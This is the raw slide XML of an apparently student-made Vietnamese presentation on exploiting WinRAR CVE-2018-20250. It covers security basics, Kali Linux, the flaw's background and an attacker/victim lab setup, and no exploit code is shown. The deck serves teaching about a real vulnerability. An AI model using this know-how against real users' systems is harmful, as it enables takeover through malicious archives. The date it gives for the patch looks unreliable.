                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-342900" lvl="2" marL="1371600" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-342900" lvl="3" marL="1828800" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-342900" lvl="4" marL="2286000" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-342900" lvl="5" marL="2743200" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-342900" lvl="6" marL="3200400" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-342900" lvl="7" marL="3657600" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-342900" lvl="8" marL="4114800" rtl="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52" name="Shape 8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853" name="Shape 853"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="854" name="Google Shape;854;p4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55" name="Google Shape;855;p4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56" name="Google Shape;856;p48"/>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7" name="Google Shape;857;p48"/>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58" name="Google Shape;858;p48"/>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9" name="Google Shape;859;p48"/>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0" name="Google Shape;860;p48"/>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1" name="Google Shape;861;p48"/>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2" name="Google Shape;862;p48"/>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3" name="Google Shape;863;p48"/>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4" name="Google Shape;864;p48"/>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865" name="Shape 865"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="866" name="Google Shape;866;p4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67" name="Google Shape;867;p49"/>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68" name="Google Shape;868;p49"/>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49"/>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0" name="Google Shape;870;p49"/>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1" name="Google Shape;871;p49"/>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2" name="Google Shape;872;p49"/>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3" name="Google Shape;873;p49"/>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4" name="Google Shape;874;p49"/>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75" name="Shape 875"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="876" name="Google Shape;876;p5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77" name="Google Shape;877;p50"/>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878" name="Google Shape;878;p50"/>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879" name="Google Shape;879;p50"/>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880" name="Google Shape;880;p50"/>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881" name="Google Shape;881;p50"/>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2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="882" name="Shape 882"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="883" name="Google Shape;883;p5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84" name="Google Shape;884;p51"/>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85" name="Google Shape;885;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602672" y="2010025"/>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86" name="Google Shape;886;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839201" y="2389868"/>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87" name="Google Shape;887;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845528" y="201002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88" name="Google Shape;888;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845522" y="2389875"/>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89" name="Google Shape;889;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602672" y="3449699"/>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90" name="Google Shape;890;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8392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91" name="Google Shape;891;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845528" y="344969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92" name="Google Shape;892;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845522"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93" name="Google Shape;893;p51"/>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1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="894" name="Shape 894"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="895" name="Google Shape;895;p5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96" name="Google Shape;896;p52"/>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897" name="Google Shape;897;p52"/>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898" name="Google Shape;898;p52"/>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899" name="Google Shape;899;p52"/>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0" name="Google Shape;900;p52"/>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1" name="Google Shape;901;p52"/>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2" name="Google Shape;902;p52"/>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3" name="Google Shape;903;p52"/>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4" name="Google Shape;904;p52"/>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905" name="Shape 905"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="906" name="Google Shape;906;p5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07" name="Google Shape;907;p5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08" name="Google Shape;908;p53"/>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53"/>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0" name="Google Shape;910;p53"/>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53"/>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2" name="Google Shape;912;p53"/>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APTION_ONLY_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="913" name="Shape 913"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="914" name="Google Shape;914;p5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15" name="Google Shape;915;p5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16" name="Google Shape;916;p54"/>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7" name="Google Shape;917;p54"/>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918" name="Google Shape;918;p54"/>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9" name="Google Shape;919;p54"/>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
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="920" name="Shape 920"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="921" name="Google Shape;921;p5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2" name="Google Shape;922;p55"/>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3" name="Google Shape;923;p55"/>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
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="924" name="Shape 924"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="925" name="Google Shape;925;p5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6" name="Google Shape;926;p56"/>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7" name="Google Shape;927;p56"/>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928" name="Google Shape;928;p56"/>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9" name="Google Shape;929;p56"/>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0" name="Google Shape;930;p56"/>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1" name="Google Shape;931;p56"/>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2" name="Google Shape;932;p56"/>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3" name="Google Shape;933;p56"/>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4" name="Google Shape;934;p56"/>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5" name="Google Shape;935;p56"/>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6" name="Google Shape;936;p56"/>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7" name="Google Shape;937;p56"/>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8" name="Google Shape;938;p56"/>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9" name="Google Shape;939;p56"/>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_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="940" name="Shape 940"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="941" name="Google Shape;941;p5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42" name="Google Shape;942;p5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43" name="Google Shape;943;p57"/>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944" name="Google Shape;944;p57"/>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945" name="Google Shape;945;p57"/>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946" name="Google Shape;946;p57"/>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947" name="Google Shape;947;p57"/>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idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1902075" y="1649150"/>
            <a:ext cx="3234300" cy="27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37416" y="42821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25075" y="-22499"/>
            <a:ext cx="1337063" cy="1237172"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="33923" w="36662">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="26481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15058" y="33923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366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192423" y="398325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284524" y="383930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192866" y="27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8244113" y="67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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499550" y="1350950"/>
            <a:ext cx="6144900" cy="228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b="1"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995320">
            <a:off x="873021" y="26303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4442638">
            <a:off x="2269077" y="311308"/>
            <a:ext cx="613074" cy="4563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rot="-995320">
            <a:off x="811429" y="24625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4442638">
            <a:off x="2386898" y="274973"/>
            <a:ext cx="421146" cy="310954"/>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txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-537545">
            <a:off x="1270979" y="1650993"/>
            <a:ext cx="3234461" cy="1264061"/>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6" name="Google Shape;216;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-537097">
            <a:off x="1451032" y="3152651"/>
            <a:ext cx="3231358" cy="767741"/>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9"/>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5000"/>
              <a:buNone/>
              <a:defRPr sz="15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theme" Target="../theme/theme3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;7;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="1101675"/>
            <a:ext cx="7717500" cy="34977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indent="-317500" lvl="1" marL="914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indent="-317500" lvl="2" marL="1371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indent="-317500" lvl="3" marL="18288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indent="-317500" lvl="4" marL="22860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indent="-317500" lvl="5" marL="27432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indent="-317500" lvl="6" marL="3200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indent="-317500" lvl="7" marL="3657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indent="-317500" lvl="8" marL="41148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15:clr>
            <a:srgbClr val="EA4335"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="5760">
          <p15:clr>
            <a:srgbClr val="EA4335"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="449">
          <p15:clr>
            <a:srgbClr val="EA4335"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" pos="5311">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796" name="Shape 796"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;79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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798" name="Google Shape;798;p36"/>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rtl="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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1889900" y="1631175"/>
            <a:ext cx="5722200" cy="16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rial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>EXPLOIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5600">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WINRAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5600">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> CVE-2018-20250</a:t>
            </a:r>
            <a:endParaRPr sz="5600">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="953" name="Google Shape;953;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1672763" y="3612063"/>
            <a:ext cx="1427100" cy="79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Nhóm 3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HK3.TX.01</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Google Shape;954;p58"/>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955" name="Google Shape;955;p58"/>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956" name="Google Shape;956;p58"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="457861">
            <a:off x="3957615" y="2091063"/>
            <a:ext cx="3497172" cy="1263974"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>CƠ SỞ LÝ THUYẾT</a:t>
            </a:r>
            <a:endParaRPr sz="5600">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017" name="Google Shape;1017;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="1187550"/>
            <a:ext cx="3435300" cy="27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8"/>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8"/>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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Những năm gần đây, trong xu thế của cuộc cách mạng công nghiệp 4.0, cùng với việc CNTT được ứng dụng ngày càng sâu rộng vào mọi mặt của đời sống, các chuyên gia đều có chung nhận định, tình hình an toàn thông tin mạng trên thế giới nói chung và Việt Nam nói riêng ngày càng diễn biến phức tạp.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024" name="Google Shape;1024;p68"/>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An toàn thông tin của Việt Nam hiện nay</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Khái niệm về bảo mật</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Google Shape;1030;p69"/>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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>An toàn thông tin: An toàn của một hệ thống thông tin thực chất là sự đảm bảo an ninh ở mức độ chấp nhận được.</a:t>
            </a:r>
            <a:endParaRPr sz="25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rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lỗ hổng bảo mật: là những điểm yếu trên hệ thống hoặc ẩn chứa trong một dịch vụ hệ thống đó cung cấp,</a:t>
            </a:r>
            <a:endParaRPr sz="25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0"/>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dựa vào đó tin tặc có thể xâm nhập trái phép để thực hiện các hành động phá hoại hoặc chiếm đoạt tài nguyên bất hợp pháp.</a:t>
            </a:r>
            <a:endParaRPr sz="2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71"/>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Giới thiệu hệ điều hành Kali Linux</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1042" name="Google Shape;1042;p71"/>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Kali Linux là một bản phân phối Linux dựa trên nền tảng Debian nhằm vào kiểm tra thâm nhập và kiểm tra bảo mật nâng cao.</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rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Kali chứa hàng trăm công cụ được hướng tới các nhiệm vụ bảo mật thông tin khác nhau.</a:t>
            </a:r>
            <a:endParaRPr sz="2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Giới thiệu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WinRAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> &amp; CVE-2018-20250</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048" name="Google Shape;1048;p72"/>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Hơn 500 triệu người dùng WinRAR, một trong những phần mềm nén và giải nén file phổ biến nhất trên hệ điều hành Windows từng đứng trước nguy cơ bị tấn công bởi lỗ hổng bảo mật nghiêm trọng này.</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73"/>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Tất cả người dùng phần mềm này trên toàn thế giới đều được khuyến cáo nên cập nhật lên phiên bản mới nhất càng sớm càng tốt.</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WinRAR đã phải tung ra một bản vá lỗ hổng bảo mật rất nghiêm trọng hồi tháng 01/2018.</a:t>
            </a:r>
            <a:endParaRPr sz="2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7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Lỗ hổng này có thể được những kẻ tấn công lợi dụng để giành quyền kiểm soát hệ thống của người dùng chỉ bằng việc "lừa" họ mở một file nén độc hại bằng WinRAR.</a:t>
            </a:r>
            <a:endParaRPr sz="2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75"/>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Lỗ hổng được phát hiện hồi năm ngoái bởi các nhà nghiên cứu bảo mật đến từ công ty Checkpoint Software, ảnh hưởng tới phiên bản WinRAR từ 5.61 trở về trước.</a:t>
            </a:r>
            <a:endParaRPr sz="2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76"/>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1069" name="Google Shape;1069;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-537545">
            <a:off x="1335929" y="2024818"/>
            <a:ext cx="3234461" cy="1264061"/>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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>KẾT QUẢ THỰC NGHIỆM</a:t>
            </a:r>
            <a:endParaRPr sz="5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59"/>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Thành viên</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="963" name="Google Shape;963;p59"/>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Hồ Sỹ Gia Trung - 2024801030101</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Vũ Chân Thật - 2124801030210</a:t>
            </a:r>
            <a:endParaRPr sz="2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77"/>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txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="2314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Máy ảo hệ điều hành Kali Linux, đây là máy attacker.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1076" name="Google Shape;1076;p7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Chuẩn bị 3 máy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1077" name="Google Shape;1077;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3179304" y="1590238"/>
            <a:ext cx="5251419" cy="260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78"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713125" y="1181800"/>
            <a:ext cx="30639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Máy ảo hệ điều hành Windows 10 đang sử dụng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>WinRAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> 5.5 là victim.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1084" name="Google Shape;1084;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
